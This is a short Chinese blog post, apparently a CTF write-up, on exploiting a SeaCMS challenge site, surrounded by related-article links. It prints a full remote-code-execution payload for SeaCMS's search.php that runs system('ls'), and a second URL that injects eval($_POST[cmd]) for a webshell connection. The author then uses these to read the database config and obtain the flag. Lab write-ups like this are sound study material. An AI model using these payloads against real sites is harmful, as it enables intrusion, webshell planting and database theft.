海洋cms

作者: gelinlang | 来源:发表于2019-04-07 16:06 被阅读0次

海洋cms
Seacms SQL注入与RCE分析
海洋cms伪静态设置演员名称：自动布局长尾关键词
首涂模板第七套苹果cmsv10【免费下载】
五个国外顶尖 CMS 行业资源汇编
2.JVM系列-CMS垃圾收集器
java CMS垃圾回收日志
基于 Laravel 框架的内容管理系统
lin-cms-dotnetcore-README
首涂模板第十三套宽屏大轮播支持DIY自适应模板支持苹果maccm

题目内容：善于查资料，你就可以拿一血了。
打开页面，显示海洋cms，查找相关漏洞，找到一个任意命令执行漏洞。
https://www.freebuf.com/vuls/150042.html
直接上payload

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(ls);

得到一连串文件，不过没有flag。那可能应该在数据库里。
换一个exp，可以直接用菜刀连接的。
https://www.uedbox.com/post/8857/

http://7d919462dc574d2e85bcd0bf0654734366f837cda98349ad.changame.ichunqiu.com/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

连接成功，找到数据库配置文件

图片.png

连上数据库，得到flag

图片.png

海洋cms
题目内容：善于查资料，你就可以拿一血了。打开页面，显示海洋cms，查找相关漏洞，找到一个任意命令执行漏洞。http...
Seacms SQL注入与RCE分析
本文作者 : 重生信安 - J0o1ey 0X001海洋CMS简介海洋cms是为解决站长核心需求而设计的视频内容...
海洋cms伪静态设置演员名称：自动布局长尾关键词
海洋CMS（seacms）是一款影视CMS程序，各方面功能都还不错，简单易用！但是个人对其演员名称的伪静态设置不满...
首涂模板第七套苹果cmsv10【免费下载】
模板作者：首涂二哥适用程序：苹果cms v10.x 海洋cmsv 9.x飞飞cms v3.x 官网地址：【首涂官...
五个国外顶尖 CMS 行业资源汇编
以下国外 CMS 资源全部来自全球顶尖 CMS 行业中立的研究机构，CMS 行业门户，开源 CMS 系统行业门户，...
2.JVM系列-CMS垃圾收集器
目录一.背景二.CMS垃圾收集器特性三.CMS执行步骤四.CMS日志解释(JDK1.8)：五.CMS参数...
java CMS垃圾回收日志
文章目录一、CMS垃圾回收器介绍二、CMS JVM运行参数三、CMS收集器运行过程1、初始标记（CMS initi...
基于 Laravel 框架的内容管理系统
cms-base-on-laravel collections of laravel cms octobercms...
lin-cms-dotnetcore-README
Lin CMS .NET Core ? A simple and practical CMS implememte...
首涂模板第十三套宽屏大轮播支持DIY自适应模板支持苹果maccm
一，首涂交流群（点击进入）【告诉百度】【官网地址】模板作者：首涂二哥适用程序：苹果cms v10.x 海洋c...